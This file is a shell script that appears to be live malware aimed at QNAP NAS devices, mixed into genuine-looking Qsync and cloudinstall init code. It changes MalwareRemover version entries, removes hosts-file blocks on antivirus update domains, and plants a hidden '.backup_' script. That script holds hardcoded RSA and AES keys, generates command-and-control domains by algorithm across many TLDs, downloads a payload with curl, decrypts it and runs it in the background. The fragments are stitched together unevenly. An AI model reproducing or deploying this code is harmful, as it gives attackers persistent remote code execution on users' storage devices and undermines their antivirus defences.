PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin"
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"` && test -d "$bdir" || bdir=''
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { while read -r bdir; do
|
||||
test -d "$bdir" && break; bdir=''
|
||||
done <<EOF
|
||||
$(mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp")
|
||||
EOF
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in {{CE_,}CACHEDEV{1,2,3},MD0,HDA}_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { bdir=/mnt/HDA_ROOT && test -d "$bdir" || bdir='/'; }; }
|
||||
|
||||
getcfg MalwareRemover Version -f /etc/config/qpkg.conf && setcfg MalwareRemover Version 3.4.1 -f /etc/config/qpkg.conf
|
||||
getcfg MalwareRemover Date -f /etc/config/qpkg.conf && setcfg MalwareRemover Date 2019-01-25 -f /etc/config/qpkg.conf
|
||||
getcfg MalwareRemover Build -f /etc/config/qpkg.conf && setcfg MalwareRemover Build 20190125 -f /etc/config/qpkg.conf
|
||||
|
||||
if grep "clamav\.net" /etc/hosts; then
|
||||
sed -i '/0.0.0.0 .*clamav\.net/d' /etc/hosts
|
||||
fi
|
||||
|
||||
if grep '0\.0\.0\.0 update\.nai\.com' /etc/hosts; then
|
||||
sed -i '/0\.0\.0\.0 update\.nai\.com/d' /etc/hosts
|
||||
fi
|
||||
|
||||
test -z "$PWD" && PWD=$(pwd)
|
||||
CWD="$PWD"
|
||||
if [ "${CWD%/*}" != "${bdir}/.qpkg" ]; then
|
||||
CWD=''
|
||||
for dir in '.config' '.liveupdate'; do
|
||||
dir="${bdir}/.qpkg/${dir}"
|
||||
test -d "$dir" && cd "$dir" && CWD="$dir" && break
|
||||
done
|
||||
fi
|
||||
test "$CWD" && test -d "$CWD" && cd "$CWD"
|
||||
|
||||
sedreplace () {
|
||||
local grepstring="$1" sedcmd="$2" file="$3"
|
||||
[ "$grepstring" ] && [ "$sedcmd" ] && [ "$file" ] || return 1
|
||||
if grep "$grepstring" "$file"; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
|
||||
sed -i "$sedcmd" "$file"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
|
||||
fi
|
||||
return $?
|
||||
}
|
||||
|
||||
for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
|
||||
file=''
|
||||
[ -f "${path#*/}" ] && file="${path#*/}" || { [ -f "${bdir}/.qpkg/${path}" ] && file="${bdir}/.qpkg/${path}"; }
|
||||
if [ "x${file}" != 'x' ]; then
|
||||
sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
|
||||
verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
|
||||
grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
sedcmd='s/g4rwwSz1Bp1i1'"'"'/g4rwwS'"''"'z1Bp1i1'"'"'/'
|
||||
grepstring='g4rwwSz1Bp1i1'"'"
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
fi
|
||||
done
|
||||
file=''
|
||||
|
||||
if [ ! -f '1550379600_c' ]; then
|
||||
touch '1550379600_c'
|
||||
test -f liveupdate.sh && { dir=.liveupdate; file=liveupdate.sh; } || { test -f backup_conf.sh && dir=.config; file=backup_conf.sh; }
|
||||
cat >".backup_${file}" <<"XEOF"
|
||||
#!/bin/sh
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
exit 1
|
||||
esac
|
||||
exit 0
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
domainexts='cf:0 tk:0 com:1 ml:0 de:0 rocks:0 mx:0 biz:0 net:1 cn:0 ga:0 gq:0 org:1 top:0 nl:0 men:0 ws:0 se:0 info:0 xyz:0 today:0 ru:0 ec:0 co:0 ee:0 rs:0 com.sv:0 com.cy:0 co.zw:0 kg:0 com.ge:0 tl:0 name:0 tw:0 lv:0 bs:0 li:0 ng:0 ae:0 bt:0 tv:0 pe:0 uz:0 me:0 gy:0 am:0 kr:0 by:0 fr:0 com.uy:0 com.lb:0 com.br:0 vu:0 hk:0 in:0 re:0 ch:0 af:0 com.ps:0 ug:0 dz:0 pro:0 co.th:0 sg:0 cd:0 so:0 mo:0 co.id:0 co.il:0 com.do:0 ke:0 cx:0 ro:0 id:0 pm:0 hm:0 vg:0 az:0 com.eg:0 bz:0 su:0 com.ar:0 gg:0 com.lr:0 pa:0 com.ve:0 al:0 fm:0 to:0 mu:0 co.ck:0 pk:0 co.rs:0 cw:0 nr:0 gd:0 gl:0 ac:0 lk:0 md:0 fi:0 sx:0 lc:0 es:0 cc:0 cm:0 la:0 co.za:0 je:0 cz:0 jp:0 ai:0 pw:0 bg:0 nu:0 ag:0 bm:0 eu:0 com.my:0 sc:0 ax:0 wf:0 ly:0 qa:0 vn:0 aq:0 mobi:0 com.tr:0 com.ua:0 com.py:0 hk.org:0 south.am:0 com.kh:0 co.zm:0 ru.net:0 com.km:0 tt:0 kn:0 co.ls:0 co.fk:0 uy.com:0 com.gu:0 .com.bn:0 com.pf:0 com.fj:0'
|
||||
n=0
|
||||
|
||||
for ext in $domainexts; do
|
||||
eval 'domainext'"$n"'=$ext'
|
||||
n=$(( $n + 1 ))
|
||||
done
|
||||
domainextcnt=$n
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
XEOF
|
||||
cat >>".backup_${file}" <<EOF
|
||||
test -d "\${bdir}/.qpkg/${dir}" || mkdir "\${bdir}/.qpkg/${dir}"
|
||||
cd "\${bdir}/.qpkg/${dir}" && rm -f .tmp.*
|
||||
EOF
|
||||
cat >>".backup_${file}" <<"XEOF"
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
|
||||
for tmpfile in "./.tmp.XXXXXX" "${bdir}/.tmp.XXXXXX" "/.tmp.XXXXXX"; do
|
||||
tmpfile=$(mktemp "./.tmp.XXXXXX")
|
||||
test -f "$tmpfile" && outfile=$tmpfile && break
|
||||
done
|
||||
test -n "${outfile}" && test -f "${outfile}" || outfile='./.tmp.out'
|
||||
curlconntimeout=12
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
for interval in '1296000' '432000' '86400' '28800' '7200' '3600'; do
|
||||
timestart=$(date +%s)
|
||||
for length in 5 3 4; do
|
||||
timenow=$(date +%s)
|
||||
test "$(( $timenow - $timestart ))" -gt 600 && test "$interval" != "3600" && break
|
||||
curlconntimeout=$(( $curlconntimeout - ( $timenow - $timestart ) / 250 ))
|
||||
test "$curlconntimeout" -lt 6 && curlconntimeout=6
|
||||
n=0; while [ "$n" -lt $domainextcnt ]; do
|
||||
eval 'ext=$domainext'"$n"
|
||||
l=$(( $length + ${ext#*:} ))
|
||||
ext=${ext%:*}
|
||||
if [ $length = 5 ]; then
|
||||
hostname=$(echo "$(( $(date +%s) / $interval ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%${hostname#??????}}
|
||||
eval 'hostname'"$n"'=$hostname'
|
||||
fi
|
||||
eval 'host=$hostname'"$n"
|
||||
n=$(( $n + 1 ))
|
||||
trycnt=0
|
||||
while [ ${#host} -gt "$l" ] && [ $trycnt -lt 3 ]; do
|
||||
trycnt=$(( $trycnt + 1 ))
|
||||
host=${host%?}
|
||||
done
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout "$curlconntimeout" -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout "$curlconntimeout" -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout "$curlconntimeout" -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
|
||||
test "${recentupdate:-0}" -eq 1 && exit 0
|
||||
for tmpfile in "./.tmp.XXXXXX" "${bdir}/.tmp.XXXXXX" "/.tmp.XXXXXX"; do
|
||||
tmpfile=$(mktemp "./.tmp.XXXXXX")
|
||||
test -f "$tmpfile" && outfile=$tmpfile && break
|
||||
done
|
||||
test -n "${outfile}" && test -f "${outfile}" || outfile='./.tmp.out'
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
